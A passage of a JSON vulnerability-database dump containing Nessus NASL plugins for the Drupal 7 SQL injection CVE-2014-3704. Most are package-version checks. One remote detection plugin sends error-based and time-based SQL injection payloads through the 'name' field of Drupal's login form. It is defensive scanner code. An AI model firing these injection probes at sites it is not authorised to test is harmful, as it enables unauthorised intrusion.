copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78521);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-3704\");\n\n script_name(english:\"FreeBSD : drupal7 -- SQL injection (6f825fa4-5560-11e4-a4c3-00a0986f28c4)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Drupal Security Team reports :\n\nDrupal 7 includes a database abstraction API to ensure that queries\nexecuted against the database are sanitized to prevent SQL injection\nattacks. A vulnerability in this API allows an attacker to send\nspecially crafted requests resulting in arbitrary SQL execution.\nDepending on the content of the requests this can lead to privilege\nescalation, arbitrary PHP execution, or other attacks. This\nvulnerability can be exploited by anonymous users.\"\n );\n # https://www.drupal.org/SA-CORE-2014-005\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?680f10b2\"\n );\n # https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?67656329\"\n );\n # https://vuxml.freebsd.org/freebsd/6f825fa4-5560-11e4-a4c3-00a0986f28c4.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a572551e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.32\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:57:23", "description": "The remote web server is running a version of Drupal that is affected\nby a SQL injection vulnerability due to a flaw in the Drupal database\nabstraction API, which allows a remote attacker to use specially\ncrafted requests that can result in arbitrary SQL execution. This may\nlead to privilege escalation, arbitrary PHP execution, or remote code\nexecution.", "edition": 27, "published": "2014-10-16T00:00:00", "title": "Drupal Database Abstraction API SQLi", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_7_CORE_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/78515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78515);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-3704\");\n script_bugtraq_id(70595);\n script_xref(name:\"EDB-ID\", value:\"34984\");\n script_xref(name:\"EDB-ID\", value:\"34992\");\n script_xref(name:\"EDB-ID\", value:\"34993\");\n script_xref(name:\"EDB-ID\", value:\"35150\");\n\n script_name(english:\"Drupal Database Abstraction API SQLi\");\n script_summary(english:\"Attempts to execute a SQLi exploit against the Drupal instance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\na SQL injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of Drupal that is affected\nby a SQL injection vulnerability due to a flaw in the Drupal database\nabstraction API, which allows a remote attacker to use specially\ncrafted requests that can result in arbitrary SQL execution. This may\nlead to privilege escalation, arbitrary PHP execution, or remote code\nexecution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2014-005\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.32\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/Drupal\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Drupal\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\nurl = build_url(qs:dir, port:port);\n\nvuln = FALSE;\ntime_based = FALSE;\n\nheaders = make_array(\"Content-Type\",\"application/x-www-form-urlencoded\");\npostdata = \"name[0;SELECT+@@version;#]=0;&name[0]=nessus&pass=nessus&test2=\" +\n \"test&form_build_id=&form_id=user_login_block&op=Log+in\";\n\nres = http_send_recv3(\n method : \"POST\",\n port : port,\n item : dir + \"/?q=node&destination=node\",\n data : postdata,\n add_headers : headers,\n exit_on_fail : TRUE\n);\n\nif (\n \">Warning</em>: mb_strlen() expects parameter\" >< res[2] &&\n \"The website encountered an unexpected error.\" >!< res[2]\n)\n{\n vuln = TRUE;\n attack_req = http_last_sent_request();\n output = strstr(res[2], \">Warning</em>: mb_strlen()\");\n}\n\n# Check time based attack for instances where error messages have been\n# disabled by the administrator -> https://www.drupal.org/node/244642\nif (!vuln && report_paranoia == 2)\n{\n stimes = make_list(4, 6, 9);\n\n for ( i = 0 ; i < max_index(stimes); i ++ )\n {\n http_set_read_timeout(stimes[i] + 10);\n then = unixtime();\n postdata = \"name[0;SELECT+sleep(\" + stimes[i] + \");#]=&name[0]=nessus\" +\n \"&pass=fake&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\";\n\n res = http_send_recv3(\n method : \"POST\",\n port : port,\n item : dir + \"/?q=node&destination=node\",\n data : postdata,\n add_headers : headers,\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n ttime = now - then;\n if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 5)) )\n {\n vuln = TRUE;\n time_based = TRUE;\n attack_req = http_last_sent_request();\n output = 'The request produced a sleep time of ' + ttime + ' seconds.';\n continue;\n }\n else\n vuln = FALSE;\n }\n}\n\nif (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n\nif (time_based)\n{\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus was able to exploit the issue using the following request :' +\n '\\n' + attack_req + '\\n' +\n '\\n' + output +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 5,\n sqli : TRUE, # Sets SQLInjection KB key\n request : make_list(attack_req),\n output : chomp(output)\n );\n exit(0);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:07", "description": "Update to upstream 7.32 security release for SA-CORE-2014-005,\nCVE-2014-3704\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2014-11-03T00:00:00", "title": "Fedora 21 : drupal7-7.32-1.fc21 (2014-12934)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2014-11-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:drupal7"], "id": "FEDORA_2014-12934.NASL", "href": "https://www.tenable.com/plugins/nessus/78795", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12934.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78795);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3704\");\n script_bugtraq_id(70595);\n script_xref(name:\"FEDORA\", value:\"2014-12934\");\n\n script_name(english:\"Fedora 21 : drupal7-7.32-1.fc21 (2014-12934)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream 7.32 security release for SA-CORE-2014-005,\nCVE-2014-3704\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1153402\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142614.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7e25f59\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"drupal7-7.32-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:09", "description": "Update to upstream 7.32 security release for SA-CORE-2014-005,\nCVE-2014-3704\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2014-10-29T00:00:00", "title": "Fedora 19 : drupal7-7.32-1.fc19 (2014-13053)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:drupal7"], "id": "FEDORA_2014-13053.NASL", "href": "https://www.tenable.com/plugins/nessus/78710", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-13053.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78710);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3704\");\n script_bugtraq_id(70595);\n script_xref(name:\"FEDORA\", value:\"2014-13053\");\n\n script_name(english:\"Fedora 19 : drupal7-7.32-1.fc19 (2014-13053)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream 7.32 security release for SA-CORE-2014-005,\nCVE-2014-3704\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1153402\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/141436.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3e12851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"drupal7-7.32-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:47", "description": "Stefan Horst discovered a vulnerability in the Drupal database\nabstraction API, which may result in SQL injection.", "edition": 18, "published": "2014-10-17T00:00:00", "title": "Debian DSA-3051-1 : drupal7 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3051.NASL", "href": "https://www.tenable.com/plugins/nessus/78518", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3051. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78518);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3704\");\n script_xref(name:\"DSA\", value:\"3051\");\n\n script_name(english:\"Debian DSA-3051-1 : drupal7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Horst discovered a vulnerability in the Drupal database\nabstraction API, which may result in SQL injection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3051\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal7 packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:08", "description": "Update to upstream 7.32 security release for SA-CORE-2014-005,\nCVE-2014-3407\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2014-10-29T00:00:00", "title": "Fedora 20 : drupal7-7.32-1.fc20 (2014-13030)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704", "CVE-2014-3407"], "modified": "2014-10-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:drupal7"], "id": "FEDORA_2014-13030.NASL", "href": "https://www.tenable.com/plugins/nessus/78707", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-13030.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78707);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3704\");\n script_bugtraq_id(70595);\n script_xref(name:\"FEDORA\", value:\"2014-13030\");\n\n script_name(english:\"Fedora 20 : drupal7-7.32-1.fc20 (2014-13030)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream 7.32 security release for SA-CORE-2014-005,\nCVE-2014-3407\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 